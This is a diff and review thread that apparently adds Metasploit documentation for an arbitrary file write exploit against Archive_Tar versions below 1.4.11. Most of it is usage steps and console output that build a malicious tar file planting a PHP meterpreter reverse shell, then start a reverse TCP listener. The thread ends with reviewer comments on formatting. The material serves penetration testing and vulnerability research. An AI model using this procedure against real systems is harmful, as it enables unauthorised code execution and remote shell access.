documentation/modules/exploit/multi/fileformat/archive_tar_arb_file_write.md

```diff
@@ -0,0 +1,147 @@
+1. `set FILEPATH *path to the file to overwrite on the target system*`
+1. `run`
+1. **Copy** the generated `exploit.tar` file to the `file_proc` directory within the directory you expanded `exploit.zip` to from earlier.
+1. **Run** `php vulnerable.php`
+1. **Verify** that the file was created in the location you specified in the `FILEPATH` parameter,
+with the contents of the PHP shell that you specified for the `PAYLOAD` parameter.
+
+
+## Options
+
+### FILENAME
+The name of the TAR file to be created locally
+
+### FILEPATH
+The full path to the file on the target system that should be
+created or overwritten with the code for a PHP shell.
+
+
+## Scenarios
+
+### Archive_Tar v1.4.10
+
+First create the malicious TAR file and set up the listener:
+
+```
+msf6 > use exploit/multi/fileformat/archive_tar_arb_file_write
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > show options
+
+Module options (exploit/multi/fileformat/archive_tar_arb_file_write):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   FILENAME                   no        The file name.
+   FILEPATH  /tmp/msf.php     yes       The full path to the file to write on the target.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.30.86.152    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+   **DisablePayloadHandler: True   (no handler will be created!)**
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Archive_Tar < 1.4.11
+
+
+msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > set FILENAME test.tar
+FILENAME => test.tar
+msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > set FILEPATH /tmp/test.php
+FILEPATH => /tmp/test.php
+msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > run
+
+[*] Writing file: test.tar (3072 bytes) ...
+[+] test.tar stored at /home/test/.msf4/local/test.tar
+msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > use multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf6 exploit(multi/handler) > set LHOST 172.30.86.152
+LHOST => 172.30.86.152
+msf6 exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 172.30.86.152:4444
+```
+
+Then copy the file over and into the expanded copy of https://github.com/pear/Archive_Tar/files/5551831/exploit.zip
+and run vulnerable.php to simulate an application opening a tar file and extracting its contents.
+
+```
+ ~/drupal/exploit/file_poc  ls                                                                                     ✔ │ 2.6.6 Ruby
```

Comment:
It'd be great to get rid of the trailing ruby version details here. I think it should be safe to remove it from documentation

Reply:
Woops yeah fair point 😄 Let me edit that up!

Reply:
Alright edited this up so that hopefully its a little bit clearer and we don't have this extra info trailing after every line.

Reply:
Edited with https://github.com/rapid7/metasploit-framework/pull/14618/commits/0ec99c03f9cea7040c79895a29c1a7efe3fc035e